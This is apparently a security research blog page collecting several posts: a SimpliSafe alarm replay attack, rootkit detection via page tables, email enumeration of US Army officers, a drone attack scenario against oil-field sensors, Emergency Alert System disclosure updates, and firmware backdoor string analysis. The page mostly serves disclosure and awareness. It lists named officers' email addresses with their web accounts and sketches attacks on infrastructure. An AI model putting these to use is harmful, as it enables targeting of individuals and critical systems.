RESEARCH | February 17, 2016

Remotely Disabling a Wireless Burglar Alarm

Countless movies feature hackers remotely turning off security systems in order to infiltrate buildings without being noticed. But how realistic are these depictions? Time to find out.
 
Today we’re releasing information on a critical security vulnerability in a wireless home security system from SimpliSafe. This system consists of two core components, a keypad and a base station. These may be combined with a wide array of sensors ranging from smoke detectors to magnet switches to motion detectors to create a complete home security system. The system is marketed as a cost-effective and DIY-friendly alternative to wired systems that require expensive professional installation and long term monitoring service contracts.
     

 

Looking at the FCC documentation for the system provides a few hints. It appears the keypad and sensors transmit data to the base station using on-off keying in the 433 MHz ISM band. The base station replies using the same modulation at 315 MHz.
 
After dismantling a few devices and looking at which radio(s) were installed on the boards, I confirmed the system is built around a star topology: sensors report to the base station, which maintains all system state data. The keypad receives notifications of events from the base station and drives the LCD and buzzer as needed; it then sends commands back to the base station. Sensors only have transmitters and therefore cannot receive messages.
 
Rather than waste time setting up an SDR or building custom hardware to mess with the radio protocol, I decided to “cheat” and use the conveniently placed test points found on all of the boards. Among other things, the test points provided easy access to the raw baseband data between the MCU and RF upconverter circuit.
 
I then worked to reverse engineer the protocol using a logic analyzer. Although I still haven’t figured out a few bits at the application layer, the link-layer framing was pretty straightforward. This revealed something very interesting: when messages were sent multiple times, the contents (except for a few bits that seem to be some kind of sequence number) were the same! This means the messages are either sent in cleartext or using some sort of cipher without nonces or salts.
 
After a bit more reversing, I was able to find a few bits that reliably distinguished a “PIN entered” packet from any other kind of packet.
 
 

 

I spent quite a while trying to figure out how to convert the captured data bytes back to the actual PIN (in this case 0x55 0x57 -> 2-2-2-2) but was not successful. Luckily for me, I didn’t need that for a replay attack.
 
To implement the actual attack I simply disconnected the MCUs from the base station and keypad, and soldered wires from the TX and RX basebands to a random microcontroller board I had sitting around the lab. A few hundred lines of C later, I had a device that would passively listen to incoming 433 MHz radio traffic until it saw a SimpliSafe “PIN entered” packet, which it recorded in RAM. It then lit up an LED to indicate that a PIN had been recorded and was ready to play back. I could then press a button at any point and play back the same packet to disarm the targeted alarm system.
 
 

 

This attack is very inexpensive to implement – it requires a one-time investment of about $250 for a commodity microcontroller board, SimpliSafe keypad, and SimpliSafe base station to build the attack device. The attacker can hide the device anywhere within about a hundred feet of the target’s keypad until the alarm is disarmed once and the code recorded. Then the attacker retrieves the device. The code can then be played back at any time to disable the alarm and enable an undetected burglary, or worse.
 
While I have not tested this, I expect that other SimpliSafe sensors (such as entry sensors) can be spoofed in the same fashion. This could allow an attacker to trigger false/nuisance alarms on demand.
 
Unfortunately, there is no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening. Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol. However, this is not an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable. This means that field upgrades of existing systems are not possible; all existing keypads and base stations will need to be replaced.
 
IOActive made attempts through multiple channels to contact SimpliSafe upon finding this critical vulnerability, but received no response from the vendor. IOActive also notified CERT of the vulnerability in the normal course of responsible disclosure. The timeline can be found here within the release advisory. 
 
SimpliSafe claims to have its units installed in over 300,000 homes in North America. Consumers of this product need to know the product is inherently insecure and vulnerable to even a low-level attacker. This simple vulnerability is particularly alarming because; 1) it exists within a “security product” that is trusted to secure over a million homes; 2) it enables an attacker to completely own the system (i.e., disable it, change PIN codes, etc.), and; 3) many unsuspecting consumers prominently display window and yards signs promoting their use of this system…essentially self-identifying their home as a viable target for an attacker. 
 
RESEARCH | September 10, 2014

Killing the Rootkit

Cross-platform, cross-architecture DKOM detection

To know if your system is compromised, you need to find everything that could run or otherwise change state on your system and verify its integrity (that is, check that the state is what you expect it to be).

“Finding everything” is a bold statement, particularly in the realm of computer security, rootkits, and advanced threats. Is it possible to find everything? Sadly, the short answer is no, it’s not. Strangely, the long answer is yes, it is.

By defining the execution environment at any point in time, predominantly through the use of hardware-based hypervisor or virtualization facilities, you can verify the integrity of that specific environment using cryptographically secure hashing.

Despite the relative ease of hash integrity checks, applying them to memory presents a number of significant challenges; the most difficult being identifying all of the processes that may execute on a system. System process control registers describe the virtual-to-physical memory layout. Only after all processes are found can integrity verification of code, data, and static/structural analysis be conducted.

“DKOM is one of the methods commonly used and implemented by Rootkits, in order to remain undetected, since this the main purpose of a rootkit.” – Harry Miller

Detecting DKOM-based processes has largely been conducted at the logical layer (see the seven different techniques https://code.google.com/p/volatility/wiki/CommandReference#psxview). This is prone to failure and iterative evasion since most process detection techniques are based on recognizing OS artifacts.
Finding Processes by Page Table Detection
When an OS starts up a process, it establishes the ability for virtual memory to be used (to enable memory protection), by creating a page table. The page table is itself a single page of physical memory (0x1000 bytes). It is usually allocated by way of a cache-optimized mechanism, which makes locating it somewhat complicated. Fortunately, we can identify a page table by understanding several established (hardware) requirements for its construction.

Even if an attacker significantly modifies and attempts to hide from standard logical object scanning, there is no way to evade page-table detection without significantly patching the OS fault handler. A major benefit to a DKOM rootkit is that it avoids code patches, that level of modification is easily detected by integrity checks and is counter to the goal of DKOM. DKOM is a codeless rootkit technique, it runs code without patching the OS to hide itself, it only patches data pointers.

IOActive released several versions of this process detection technique. We also built it into our memory integrity checking tools, BlockWatch™ and The Memory Cruncher™.

Processbased Page Table Detection
Any given page of memory could be a page table. Typically a page table is organized as a series of page table entries (PTEs). These entries are usually traversed by selecting some bits from a virtual address and converting them into a series of table lookups.

The magic of this technique comes from the propensity of all OS (at least Windows, Linux, and BSD) to organize their page tables into virtual memory. That way they can use virtual addresses to edit PTEs instead of physical memory addresses.

By making all of the offsets the same with the entry at that offset pointing back to the page table base value (CR3), the page table can essentially be accessed through this special virtual address. Refer to the Linux article for an exhaustive explanation of why this is useful.
Physical Memory Page 
 
If we consider any given page of random physical memory, we can detect the following offsets as a valid PTE. Windows has proven to consume, for every process, entry 0, entry 0x1ED (self map), and a couple of additional kernel regions (consistent across all Win64 versions).
PTE Format
 
typedef struct _HARDWARE_PTE {
    ULONGLONG Valid : 1; Indicates hardware or software handling (Mode 1 and 2)
    ULONGLONG Write : 1;
    ULONGLONG Owner : 1;
    ULONGLONG WriteThrough : 1;
    ULONGLONG CacheDisable : 1;
    ULONGLONG Accessed : 1;
    ULONGLONG Dirty : 1;
    ULONGLONG LargePage : 1; Mode 2
    ULONGLONG Global : 1;
    ULONGLONG CopyOnWrite : 1;
    ULONGLONG Prototype : 1; Mode 2
    ULONGLONG reserved0 : 1;
    ULONGLONG PageFrameNumber : 36; PFN, always incrementing (Mode 1 and 2)
    ULONGLONG reserved1 : 4;
    ULONGLONG SoftwareWsIndex : 11; Mode 2
    ULONGLONG NoExecute : 1;
} HARDWARE_PTE, *PHARDWARE_PTE;
By checking the physical memory offsets we expect, extracting a candidate entry, we can determine if the physical page is a valid page table. There are a number of properties we understand about physical memory: the address of page frame number (PFN) will always increase from earlier pages and will not be larger than the current linear position + memory gap ranges.
What About Shadow Walker Tricks?
 
Shadow walker abuses the nature of the TLB of a running system. Execution may occur at a different address than when reading. If you look/scan/check memory, the address will be cloaked onto what you expect when reading, while execution will actually occur somewhere different.
This is one reason why we analyze memory extracted from a hypervisor “guest” OS snapshot. Analyzing memory from behind a hypervisor establishes a “semantic gap” that ensures our static memory analysis includes all possible memory pages, unaffected by split I/D TLB games.
What About Hardware Rootkits?
 
Using a hypervisor makes verifying device memory easy. Verification at the host or physical layer is extremely complicated. Different hardware vendors have vastly different ways to extract and interact with firmware, UEFI may be verifiable with Mitre’s Copernicus2 or other tools.
In order for a hypervisor to be effected by a hardware rootkit, the hypervisor has to have been “escaped”, which is currently a rare and valuable exploit. It is probably not worth risking such a valuable exploit for a hardware rootkit that can be mitigated by the network. Extracting physical system memory in a consistent way (immune to attack and evasion) has historically been very hard.
If you are concerned about hardware rootkits, there are some extreme techniques that may help.
IOActive has Everything
 
Now that we have established a method for finding everything, the next task is relatively simple. Do some checking to ensure that what we found is what we expected. Using cryptographically secure hash checks in a whitelist fashion is a straight-forward and hard-to-attack technique for integrity verification.
IOActive’s current solution, BlockWatch™, does just that. It manages memory extraction and hash checking that testifies to what we have found.
Weird Rootkits
I classify “weird rootkits” as anything from a RoP-based rootkit to some form of script injection or anything else where the attacker can coerce an application to behave in an unexpected (and rootkit-like) way.
Detecting a RoP is actually quite easy (stack checking a memory snapshot). I covered some of this in a CanSecWest presentation I gave earlier this year. Each return address on a stack must be preceded by a call instruction. You can then validate that the opcode exists and the return address is not spurious (as is the case for a RoP attack). RoP stacks are also exceedingly large and are atypical of normal threads.
What about other attacks, rootkits implemented in server scripts and anything else? If we have found the address spaces for all of the processes and are able to validate the integrity of all of the kernel code, then any scripts or weird rootkits will be observable through normal profiling and logging interfaces.
Summary
 
By leveraging the unique ability of a hypervisor to expose the physical memory of a system in a way that is consistent (not modified by an attacker), we can use a high-assurance process detection technique combined with integrity checking to detect any rootkit.

Shane Macaulay

Additional References
  • BlockWatch™
  • DEF CON 22 Presentation: “Weird-machine Motivated Practical Page Table Shellcode & Finding Out What’s Running on Your System
  • PMODUMP
  • Windows Debugging Blog on understanding !PTE
INSIGHTS | December 4, 2013

Practical and cheap cyberwar (cyber-warfare): Part II

Disclaimer: I did not perform any illegal attacks on the mentioned websites in order to get the information I present here. No vulnerability was exploited on the websites, and they are not known to be vulnerable.
 
Given that we live in an age of information leakage where government surveillance and espionage abound, I decided in this second part to focus on a simple technique for information gathering on human targets. If an attacker is targeting a specific country, members of the military and defense contractors would make good human targets. When targeting members of the military, an attacker would probably focus on high ranking officers and for defense contractors, an attacker would focus on key decision makers, C-level executives, etc. Why? Because if an attacker compromises these people, they could gain access to valuable information related to their work, their personal life, and family. Data related to their work could help an attacker strategically by enabling them to build better defenses, steal intellectual property, and craft specific attacks. Data related to a target’s personal life could help attackers for blackmailing or attacking the target’s families.
 
 
There is no need to work for the NSA and have a huge budget in order to get juicy information. Everything is just one click away; attackers only need to find ways to easily milk the web. One easy way to gather information about people is to get their email addresses as I have described last year here http://blog.ioactive.com/2012/08/the-leaky-web-owning-your-favorite-ceos.html . Basically you use a website registration form and/or forgotten password functionality to find out if an email address is already registered on a website. With a list of email addresses attackers can easily enumerate the websites/services where people have accounts. Given the ever-increasing number of online accounts one person usually has, this could provide a lot of useful information. For instance, it could make perform phishing attacks and social engineering easier (see http://www.infosecurity-magazine.com/view/35048/hackers-target-mandiant-ceo-via-limo-service/). Also, if one of the sites where the target has an account is vulnerable, that website could be hacked in order to get the target’s account password. Due to password reuse, attackers can compromise all the target accounts most of the time. 
 
 
This is intended to be easy and practical, so let’s get hands on. I did this research about a year ago. First, I looked for US Army email addresses. After some Google.com searches, I ended up with some PDF files with a lot of information about military people and defense contractors:

I extracted some emails and made a list. I ended up with:
 
1784 total email addresses: military (active and retired), civilians, and defense contractors.
 
I could have gotten more email addresses, but that was enough for testing purposes. I wasn’t planning on doing a real attack.
 
I had a very simple (about 50 LoC or so) Python tool (thanks to my colleague Ariel Sanchez for quickly building original tool!) that can be fed a list of websites and email addresses. I had already built the website database with 20 or so common and well known websites (I should have used military related ones too for better results, but it still worked well), I loaded the list of email addresses I had found, and then ran the tool. A few minutes later I ended up with a long list of email addresses and the websites where those email addresses were used (meaning where the owners of those email addresses have accounts):
 
Site
Accounts
     %
Facebook
  308
17.26457
Google
  229
12.83632
Orbitz
  182
10.20179
WashingtonPost
  149
8.352018
Twitter 
  108
6.053812
Plaxo
  93
5.213004
LinkedIn
  65
3.643498
Garmin
  45
2.522422
MySpace
  44
2.466368
Dropbox
  44
2.466368
NYTimes
  36
2.017937
NikePlus
  23
1.289238
Skype
  16
0.896861
Hulu
  13
0.7287
Economist
  11
0.616592
Sony Entertainment Network
  9
0.504484
Ask
  3
0.168161
Gartner
  3
0.168161
Travelers
  2
0.112108
Naymz
  2
0.112108
Posterous
  1
0.056054
 
Interesting to find accounts on Sony Entertainment Network website, who says the military can’t play Playstation 🙂
 
I decided that I should focus on something juicier, not just random .mil email addresses. So, I did a little research about high ranking US Army officers, and as usual, Google and Wikipedia ended up being very useful.
 
Let’s start with US Army Generals. Since this was done in 2012, some of them could be retired now.

 
I found some retired ones that now may be working for defense contractors and trusted advisors:

 
Active US Army Generals seem not to use their .mil email addresses on common websites; however, we can see a pattern that almost all of them use orbitz.com. For retired ones, since we got the personal (not .mil) email addresses, we can see they use them on many websites.

After US Army Generals, I looked at Lieutenant Generals (we could say future Generals):

Maybe because they are younger they seem to use their .mil email address in several common websites including Facebook.com. Even more, they have most of their Facebook information available to public! I was thinking about publishing the related Facebook information, but I will leave it up to you to explore their Facebook profiles.
 


I also looked for US Army Mayor Generals and found at least 15 of them:
 
Robert Abrams
Email: robert.abrams@nullus.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: washingtonpost.com
 
 
Jamos Boozer
Email: james.boozer@nullus.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: facebook.com
 
 
Vincent Brooks
Email: vincent.brooks@nullus.army.mil
 
 
 
Found account on site: facebook.com
 
Found account on site: linkedin.com
 
 
James Eggleton
Email: james.eggleton@nullus.army.mil
 
 
 
Found account on site: plaxox.com
 
 
Reuben Jones
Email: reuben.jones@nullus.army.mil
 
 
 
Found account on site: plaxo.com
 
Found account on site: washingtonpost.com
 
 
 
 
David quantock
Email: david-quantock@nullus.army.mil
 
 
 
Found account on site: twitter.com
 
Found account on site: orbitz.com
 
Found account on site: plaxo.com
 
 
 
 
Dave Halverson
Email: dave.halverson@nullconus.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Jo Bourque
Email: jo.bourque@nullus.army.mil
 
 
 
Found account on site: washingtonpost.com
 
 
 
 
Kev Leonard
Email: kev-leonard@nullus.army.mil
 
 
 
Found account on site: facebook.com
 
 
James Rogers
Email: james.rogers@nullus.army.mil
 
 
 
Found account on site: plaxo.com
 
 
 
 
William Crosby
Email: william.crosby@nullus.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Anthony Cucolo
Email: anthony.cucolo@nullus.army.mil
 
 
 
Found account on site: twitter.com
 
Found account on site: orbitz.com
 
Found account on site: skype.com
 
Found account on site: plaxo.com
 
Found account on site: washingtonpost.com
 
Found account on site: linkedin.com
 
 
Genaro Dellrocco
Email: genaro.dellarocco@nullmsl.army.mil
 
 
 
Found account on site: linkedin.com
 
 
Stephen Lanza
Email: stephen.lanza@nullus.army.mil
 
 
 
Found account on site: skype.com
 
Found account on site: plaxo.com
 
Found account on site: nytimes.com
 
 
Kurt Stein
Email: kurt-stein@nullus.army.mil
 
 
 
Found account on site: orbitz.com
 
Found account on site: skype.com
 
 
Later I found about 7 US Army Brigadier General and 120 US Army Colonel email addresses, but I didn’t have time to properly filter the results. These email addresses were associated with many website accounts.
 
Basically, the 1784 total email addresses included a broad list of ranking officers from the US Army.
 
Doing a quick analysis of the gathered information we could infer: 
  • Many have Facebook accounts exposing to public the family and friend relations that could be targeted by attackers. 
  • Most of them read and are probably subscribed to The Washington Post (makes sense, no?). This could be an interesting avenue for attacks such as phishing and watering hole attacks. 
  • Many of them use orbitz.com, probably for car rentals. Hacking this site can give attackers a lot of information about how they move, when they travel, etc. 
  • Many of them have accounts on google.com probably meaning they have Android devices (Smartphones, tablets, etc.).This could allow attackers to compromise the devices remotely (by email for instance) with known or 0days exploits since these devices are not usually patched and not very secure.
  • And last but not least, many of them including Generals use garmin.com or nikeplus.com. Those websites are related with GPS devices including running watches. These websites allow you to upload GPS information making them very valuable for attackers for tracking purposes. They could know on what area a person usually runs, travel, etc.

 

 
As we can see, it’s very cheap and easy to get information about ranking members of the US Army. People serving in the US Army should take extra precautions. They should not make their email addresses public and should only use them for “business” related issues, not personal activities.
INSIGHTS | November 11, 2013

Practical and cheap cyberwar (cyber-warfare): Part I

Every day we hear about a new vulnerability or a new attack technique, but most of the time it’s difficult to imagine the real impact. The current emphasis on cyberwar (cyber-warfare if you prefer) leads to myths and nonsense being discussed. I wanted to show real life examples of large scale attacks with big impacts on critical infrastructure, people, companies, etc.
 

The idea of this post is to raise awareness. I want to show how vulnerable some industrial, oil, and gas installations currently are and how easy it is to attack them. Another goal is to pressure vendors to produce more secure devices and to speed up the patching process once vulnerabilities are reported.


The attack in this post is based on research done by my fellow pirates, Lucas Apa and Carlos Penagos. They found critical vulnerabilities in wireless industrial control devices. This research was first presented at BH USA 2013. You can find their full presentation here https://www.blackhat.com/us-13/archives.html#Apa
 
A common information leak occurs when vendors highlight how they helped Company X with their services or products. This information is very useful for supply chain attacks. If you are targeting Company X, it’s good to look at their service and product providers. It’s also useful to know what software/devices/technology they use.

 

In this case, one of the vendors that sells vulnerable wireless industrial control devices is happy to announce in a press release that Company X has acquired its wireless sensors and is using them in the Haynesville Shale fields. So, as an attacker, we now know that Company X is using vulnerable wireless sensors at the Haynesville Shale fields. Haynesville Shale fields, what’s that? Interesting, with a quick Google search you end up with:
 
 
 
How does Google know about shale well locations? It’s simple, publically-available information. You can display wells by name, organization, etc.:
 
 
 
 
 
Even interactive maps are available:
 
 
 
You can find all of Company X’s wells along with their exact location (geographical coordinates). You know almost exactly where the vulnerable wireless sensors are installed.
 
Since the wells are at a remote location, exploiting the wireless sensor vulnerabilities becomes an interesting challenge. Enter drones, UAV unmanned aerial vehicles. Commercially available drones range from a couple hundred dollars to tens of thousands dollars, depending on range, endurance, functionality, etc. You can even build your own and save some money. The idea is to put the attack payload in a drone, send it to the wells’ location, and launch the attack. This isn’t difficult to do since drones can be programmed to fly to x,y coordinates and execute the payload while flying around the target coordinates (no need to return). 
 
Depending on your budget, you can launch an attack from a nearby location or very far away. Depending on the drone’s endurance, you can be X miles away from the target. You can extend the drone’s range depending on the radio and antenna used. 
 
The types of exploits you could launch from the drone range from bricking all of the wireless devices to causing some physical harm on the shale gas installations. Manipulating device firmware or injecting fake data on radio packets could make the control systems believe things like the temperature or pressure are wrong. Just bricking the devices could result in significant lost money to Company X. The devices would need to be reconfigured/reflashed. The exploits could interfere with shale gas extraction and even halt production. The consequences of an attack could be even more catastrophic depending on how the vulnerable devices are being used.
 
Attacks could be expanded to target more than just one vendor’s device. Drones could do reconnaissance first, scan and identify devices from different vendors, and then launch attacks targeting all of the specific devices.
 
In order to highlight attack possibilities and impact consequences I extracted the following from http://www.onworld.com/news/newsoilandgas.html (the companies mentioned in this article are not necessarily vulnerable, this is just for illustrative purposes):
 
“…Pipelines & Corrosion Monitoring
Wireless flow, pressure, level, temperature and valve position monitoring are used to streamline pipeline operation and storage while increasing safety and regulatory compliance. In addition, wireless sensing solutions are targeted at the billions of dollars per year that is spent managing pipeline corrosion. While corrosion is a growing problem for the aging pipeline infrastructure it can also lead to leaks, emissions and even deadly explosions in production facilities and refineries….”
 
Leaks and deadly explosions can have sad consequences.
 
Cyber criminals, terrorists, state actors, etc. can launch big impact attacks with relatively small budgets. Their attacks could produce economical loses, physical damage, even possible explosions.
 
While isolated attacks have a small impact when put in the context of cyberwar, they can cause panic in populations, political crisis, or geopolitical problems if combined with other larger impact attacks.
Probably in a future post I will describe more of these kinds of large scale, big impact attacks.
INSIGHTS | October 17, 2013

Strike Two for the Emergency Alerting System and Vendor Openness

Back in July I posted a rant about my experiences reporting the DASDEC issues and the problems I had getting things fixed. Some months have passed and I thought it would be a good time to take a look at how the vulnerable systems have progressed since then.

Well, back then my biggest complaint was the lack of forthrightness in Monroe Electronics’ public reporting of the issues; they were treated as a marketing problem rather than a security one. The end result (at the time) was that there were more vulnerable systems available on the internet – not fewer – even though many of the deployed appliances had adopted the 2.0-2 patch.

What I didn’t know at the time was that the 2.0-2 patch wasn’t as effective as one would have hoped; in most cases bad and predictable credentials were left in place intentionally – as in I was informed that Monroe Electronics were “intentionally not removing the exposed key(s) out of concern for breaking things.”

In addition to not removing the exposed keys, it didn’t appear that anyone even tried to review or audit any other aspect of the DASDEC security before pushing the update out. If someone told you that you had a shared SSH key for root you might say… check the root password wasn’t the same for every box too right? Yeah… you’d think so wouldn’t you!

After discovering that most of the “patched” servers running 2.0-2 were still vulnerable to the exposed SSH key I decided to dig deeper in to the newly issued security patch and discovered another series of flaws which exposed more credentials (allowing unauthenticated alerts) along with a mixed bag of predictable and hardcoded keys and passwords. Oh, and that there are web accessible back-ups containing credentials.

Even new features introduced to the 2.0-2 version since I first looked at the technology appeared to contain a new batch of hardcoded (in their configuration) credentials.

Upon our last contact with CERT we were informed that ‘[t]hese findings are entering the realms of “not terribly serious” and “not something the vendor can practically do much about.”‘

Go team cyber-security!

So… on one hand we’ve had one zombie alert and a good hand-full of responsibly disclosed issues which began back in January 2013… on the other hand I’m not sure anything changed except for a few default passwords and some version numbers.

Let’s not forget that the EAS is a critical national infrastructure component designed to save lives in an emergency. Ten months on and the entire system appears more vulnerable than when we began pointing out the vulnerabilities.
INSIGHTS | July 11, 2013

Why Vendor Openness Still Matters

When the zombies began rising from their graves in Montana it had already been over 30 days since IOActive had reported issues with Monroe Electronics DASDECS.
 
And while it turned out in the end that the actual attacks which caused the false EAS messages to be transmitted relied on the default password never having been changed, this would have been the ideal point to publicize that there was a known issue and that there was a firmware update available, or would soon be to address this and other problems… maybe a mitigation or two in the mean time right?

At a minimum it would have been an ideal time to provide the simple mitigation:
“rm ~/.ssh/authorized_keys”
 
Unfortunately this never happened, leading to a phenomena I like to call “admin droop”.  This is where an administrator, after discovering the details of a published vulnerability, determines that he’s not vulnerable because he doesn’t run the default configuration and everything is working and doesn’t bother to upgrade to the next version.
 
… it happens…
 
In the absence of reliable information other outlets such as the FCC provided pretty minimal advice about changing passwords and using firewalls; I simply commented to the media that this was “inadequate” advice.
 
Eventually, somewhere around April 24 Monroe, with the assistance of CERT begin contacting customers about a firmware fix, we provided a Shodan XML file with a few hundred vulnerable hosts to help track them down. Finally it looked like things were getting fixed but I was somewhat upset that I still had not seen official acknowledgement of the issue from Monroe but on June 13 Monroe finally published this /wp-content/uploads/2013/07/130604-Monroe-Security-PR.pdf 
security advisory where it stated “Removal of default SSH keys and a simplified user option to load new SSH keys”, ok its not much of an “announcement” but its something and  I know it says April 24, but both the filename and metadata (pdfinfo) point to cough later origins…
 
Inside the advisory is this wonderful sentence: 
“The company notes that most of its users already have obtained this update.”… That sound s like something worth testing!
 
Then it happened, before I could say “admin droop”… 
 
Found/Vulnerable hosts before we reported the issue:   222
Found hosts After the patch was released, as found by a survey on July  11:  412
 
Version numbers       
         Hosts Found
       Vulnerable (SSH Key)
1.8-5a
                1
                 Yes
1.8-6
                2
                 Yes
2.0-0
              110
                 Yes
2.0-0_a01
                1
                 Yes
2.0-1
               68           
                 Yes
2.0-2 (patched)
               50
                  No
unreachable                              180

While most users may have “obtained” the update, someone certainly didn’t bother applying it…
 
Yep… it’s worse now than it was before we reported the issue in January, and everyone thinks everything is just fine. While I’m sure this would still be a problem had a proper security notice been issued.
 
I can’t say it any better than these awesome folks over at Google http://googleonlinesecurity.blogspot.com/2013/05/disclosure-timeline-for-vulnerabilities.html : “Our standing recommendation is that companies should fix critical vulnerabilities within 60 days — or, if a fix is not possible, they should notify the public about the risk and offer workarounds.”

 

INSIGHTS | May 23, 2013

Identify Backdoors in Firmware By Using Automatic String Analysis

The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) this Friday published an advisory about some backdoors I found in two programmable gateways from TURCK, a leading German manufacturer of industrial automation products.
Using hard-coded account credentials in industrial devices is a bad idea. I can understand the temptation among manufacturers to include a backdoor “support” mechanism in the firmware for a product such as this. This backdoor allows them to troubleshoot problems remotely with minimal inconvenience to the customer.

On the other hand, it is only a matter of time before somebody discovers these ‘secret’ backdoors. In many cases, it takes very little time.

The TURCK backdoor is similar to other backdoors that I discussed at Black Hat and in previous blog posts. The common denominator is this: you do not need physical access to an actual device to find its backdoor. All you have to do is download device firmware from the vendor’s website. Once you download the firmware, you can reverse engineer it and learn some interesting secrets.
For example, consider the TURCK firmware. The binary file contains a small header, which simplifies the reverse engineering process:

 

 

The offset 0x1c identifies the base address. Directly after the header are the ARM opcodes. This is all the information you need to load the firmware into an IDA disassembler and debugger.

A brief review revealed that the device has its own FTP server, among other services. I also discovered several hard-coded credentials that are added when the system starts. Together, the FTP server and hard-coded credentials are a dangerous combination. An attacker with those credentials can completely compromise this device.
Find Hidden Credentials Fast
You can find hidden credentials such as this using manual analysis. But I have a method to discover hidden credentials more quickly. It all started during a discussion with friends at the LaCon conference regarding these kinds of flaws. One friend (hello @p0f ! ) made an obvious but interesting comment: “You could just find these backdoors by running the ‘strings’ command on the firmware file, couldn’t you?”

This simple observation is correct. All of the backdoors that are already public (such as Schneider, Siemens, and TURCK) could have been identified by looking at the strings … if you know common IT/embedded syntax. You still have to verify that potential backdoors are valid. But you can definitely identify suspicious elements in the strings.
There is a drawback to this basic approach. Firmware usually contains thousands of strings and it can take a lot of time to sift through them. It can be much more time consuming than simply loading the firmware in IDA, reconstructing symbols, and finding the ‘interesting’ functions.
So how can one collect intelligence from strings in less time? The answer is an analysis tool we created and use at IOActive called Stringfighter.
How Does Stringfighter Work?
Imagine dumping strings from a random piece of firmware. You end up with the following list of strings:
[Creating socket]
ERROR: %n
Initializing 
Decompressing kernel
GetSrvAddressById
NO_ADDRESS_FOUND
Xi$11ksMu8!Lma

 

From your security experience you notice that the last string seems different from the others—it looks like a password rather than a valid English word or a symbol name. I wanted to automate this kind of reasoning.
This is not code analysis. We only assume certain common patterns (such as sequential strings and symbol tables) usually found in this kind of binary. We also assume that compilers under certain circumstances put strings close to their references.
As in every decision process, the first step is to filter input based on selected features. In this case we want to discover ‘isolated’ strings. By ‘isolated’ I’m referring to ‘out-of-context’ elements that do not seem related to other elements.
An effective algorithm known as the ‘Levenshtein distance’ is frequently used to measure string similarity:
To apply this algorithm we create a window of n bytes that scans for ‘isolated’ strings. Inside that window, each string is checked against its ‘neighbors’ based on several metrics including, but not limited to, the Levenshtein distance.
However, this approach poses some problems. After removing blocks of ‘related strings,’ some potentially isolated strings are false positive results. For example, an ‘isolated’ string may be related to a distant ‘neighbor.’
We therefore need to identify additional blocks of ‘related strings’ (especially those belonging to symbol tables) formed between distant blocks that later become adjacent.
To address this issue we build a ‘first-letter’ map and run this until we can no longer remove additional strings.
At this point we should have a number of strings that are not related. However, how can we decide whether the string is a password? I assume developers use secure passwords, so we have to find strings that do not look like natural words.
We can consider each string as a first-order Markov source. To do this, use the following formula to calculate its entropy rate:
We need a large dictionary of English (or any other language) words to build a transition matrix. We also need a black list to eliminate common patterns.
We also want to avoid the false positives produced by symbols. To do this we detect symbols heuristically and ‘normalize’ them by summing the entropy for each of its tokens rather than the symbol as a whole.
These features help us distinguish strings that look like natural language words or something more interesting … such as undocumented passwords.
The following image shows a Stringfighter analysis of the TURCK BL20 firmware. The first string in red is highlighted because the tool detected that it is interesting.
In this case it was an undocumented password, which we eventually confirmed by analyzing the firmware.
The following image shows a Stringfighter analysis of the Schneider NOE 771 firmware. It revealed several backdoor passwords (VxWorks hashes). Some of these backdoor passwords appear in red.

Stringfighter is still a proof-of-concept prototype. We are still testing the ideas behind this tool. But it has exceeded our initial expectations and has detected backdoors in several devices. The TURCK backdoor identified in the CERT advisory will not be the last one identified by IOActive Labs. See you in the next advisory!
INSIGHTS | February 6, 2013

The Anatomy of Unsecure Configuration: Reality Bites

As a penetration tester, I encounter interesting problems with network devices and software. The most common problems that I notice in my work are configuration issues. In today’s security environment, we can accept that a zero-day exploit results in system compromise because details of the vulnerability were unknown earlier. But, what about security issues and problems that have been around for a long time and can’t seem to be eradicated completely? I believe the existence of these types of issues shows that too many administrators and developers are not paying serious attention to the general principles of computer security. I am not saying everyone is at fault, but many people continue to make common security mistakes. There are many reasons for this, but the major ones are:

  • Time constraints: This is hard to imagine, because an administrator’s primary job is to manage and secure the network. For example: How long does it take to configure and secure a network printer? If you ask me, it should not take much time to evaluate and configure secure device properties unless the network has significant complex requirements. But, even if there are complex requirements, it is worth investing the time to make it harder for bad guys to infiltrate the network.
  • Ignorance, fear, and a ‘don’t care’ attitude: This is a human problem. I have seen many network devices that are not touched or reconfigured for years and administrators often forget about them. When I have discussed this with administrators they argued that secure reconfiguration might impact the reliability and performance of the device. As a result, they prefer to maintain the current functionality but at the risk of an insecure configuration.
  • Problems understanding the issue: If complex issues are hard to understand, then easy problems should be easy to manage, right? But it isn’t like that in the real world of computer security. For example, every software or network device is accompanied by manuals or help files. How many of us spend even a few minutes reading the security sections of these documents? The people who are cautious about security read these sections, but the rest just want to enjoy the device or software’s functionality. Is it so difficult to read the security documentation that is provided? I disagree.  For a reasonable security assessment of any new product and software, reading the manuals is one key to impressive results. We cannot simply say we don’t understand the issue­­­ and if we ignore the most basic security guidance, then attackers have no hurdles in exploiting the most basic known security issues.

 

Default Configuration – Basic Authentication

 

Here are a number of examples to support this discussion:

The majority of network devices can be accessed using Simple Network Management Protocol (SNMP) and community strings that typically act as passwords to extract sensitive information from target systems. In fact, weak community strings are used in too many devices across the Internet. Tools such as snmpwalk and snmpenum make the process of SNMP enumeration easy for attackers. How difficult is it for administrators to change default SNMP community strings and configure more complex ones? Seriously, it isn’t that hard.

A number of devices such as routers use the Network Time Protocol (NTP) over packet-switched data networks to synchronize time services between systems. The basic problem with the default configuration of NTP services is that NTP is enabled on all active interfaces. If any interface exposed on the Internet uses UDP port 123 the remote user can easily execute internal NTP readvar queries using ntpq to gain potential information about the target server including the NTP software version, operating system, peers, and so on.

